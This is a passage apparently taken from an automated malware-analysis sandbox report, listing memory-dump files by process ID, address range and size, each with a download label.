memory/2696-170-0x0000000000000000-mapping.dmp

Download
memory/2696-181-0x0000000006662000-0x0000000006663000-memory.dmp

Filesize
4KB

Download
memory/2696-180-0x0000000006660000-0x0000000006661000-memory.dmp

Filesize
4KB

Download
memory/2832-198-0x0000000000A14AA0-mapping.dmp

Download
memory/2836-214-0x0000000000A14AA0-mapping.dmp

Download
memory/2940-219-0x00000000073F2000-0x00000000073F3000-memory.dmp

Filesize
4KB

Download
memory/2940-216-0x0000000000000000-mapping.dmp

Download
memory/2940-220-0x00000000073F3000-0x00000000073F4000-memory.dmp

Filesize
4KB

Download
memory/2940-218-0x00000000073F0000-0x00000000073F1000-memory.dmp

Filesize
4KB

Download
memory/2980-202-0x0000000000000000-mapping.dmp

Download
memory/2988-225-0x0000000000A14AA0-mapping.dmp

Download
memory/3288-221-0x0000000000A14AA0-mapping.dmp

Download
memory/3556-115-0x0000000000000000-mapping.dmp

Download
memory/3864-121-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/3864-118-0x0000000000000000-mapping.dmp

Download
memory/3908-213-0x0000000000A14AA0-mapping.dmp

Download
memory/3936-144-0x0000000000000000-mapping.dmp

Download
memory/4068-215-0x0000000000A14AA0-mapping.dmp

Download
memory/4072-226-0x0000000000A14AA0-mapping.dmp

Download